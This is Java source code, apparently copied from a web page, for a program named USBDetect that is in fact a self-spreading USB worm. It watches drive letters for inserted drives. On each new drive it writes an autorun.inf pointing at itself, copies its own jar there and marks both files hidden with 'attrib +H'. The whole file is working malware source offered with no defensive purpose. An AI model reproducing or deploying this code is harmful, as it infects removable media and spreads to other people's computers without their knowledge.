package usbdetect;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.security.CodeSource;
import javax.swing.JOptionPane;
public class USBDetect {
    public static String getJar ( Class aclass ) throws Exception {
        CodeSource codeSource = aclass.getProtectionDomain().getCodeSource();
        File jarFile;
        if ( codeSource.getLocation() != null ) {
            jarFile = new File ( codeSource.getLocation().toURI() );
        } else {
            String path = aclass.getResource ( aclass.getSimpleName() + ".class" ).getPath();
            String jarFilePath = path.substring ( path.indexOf ( ":" ) + 1, path.indexOf ( "!" ) );
            jarFilePath = URLDecoder.decode ( jarFilePath, "UTF-8" );
            jarFile = new File ( jarFilePath );
        }
        return jarFile.getParentFile().getAbsolutePath() + "\\USBDetect.jar";
    }
    public static void copy ( String Driver ) throws FileNotFoundException, IOException, Exception {
        File srcDir = new File ( getJar ( USBDetect.class ) );
        FileInputStream fii;
        FileOutputStream fio;
        fii = new FileInputStream ( srcDir );
        fio = new FileOutputStream ( Driver + "\\USBDetect.jar" );
        byte[] b = new byte[1024];
        while ( ( fii.read ( b ) ) > 0 ) {
            System.out.println ( b );
            fio.write ( b );
        }
        fii.close();
        fio.close();
    }
    public static void setHidden ( File file ) throws InterruptedException, IOException {
        Process p = Runtime.getRuntime().exec ( "attrib +H " + file.getPath() );
        p.waitFor();
    }
    public static void USBDetect() throws FileNotFoundException, UnsupportedEncodingException, IOException, InterruptedException {
        String[] letters = new String[] {"A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"};
        File[] drives = new File[letters.length];
        boolean[] isDrive = new boolean[letters.length];
        for ( int i = 0; i < letters.length; ++i ) {
            drives[i] = new File ( letters[i] + ":/" );
            isDrive[i] = drives[i].canRead();
        }
        System.out.println ( "FindDrive: waiting for devices..." );
        while ( true ) {
            for ( int i = 0; i < letters.length; ++i ) {
                boolean pluggedIn = drives[i].canRead();
                if ( pluggedIn != isDrive[i] ) {
                    if ( pluggedIn ) {
                        System.out.println ( "Drive " + letters[i] + " has been plugged in" );
                        File jar = new File ( letters[i] + ":/" + "\\USBDetect.jar" );
                        File autorun = new File ( letters[i] + ":/" + "\\autorun.inf" );
                        if ( autorun.exists() && jar.exists() ) {
                        } else {
                            BufferedWriter inf = new BufferedWriter ( new FileWriter ( autorun ) );
                            try {
                                inf.write ( "[autorun] \n" );
                                inf.write ( "open=USBDetect.jar" );
                                inf.close();
                                copy ( letters[i] + ":/" );
                                setHidden ( jar );
                                setHidden ( autorun );
                            } catch ( Exception e ) {
                                e.printStackTrace();
                            }
                        }
                    } else {
                        System.out.println ( "Drive " + letters[i] + " has been unplugged" );
                        isDrive[i] = pluggedIn;
                    }
                }
                try {
                    Thread.sleep ( 100 );
                } catch ( InterruptedException e ) {
                }
            }
        }
    }
    public static void main ( String[] args ) throws UnsupportedEncodingException, IOException, FileNotFoundException, InterruptedException, Exception {
        USBDetect();
    }
}
< / pre >
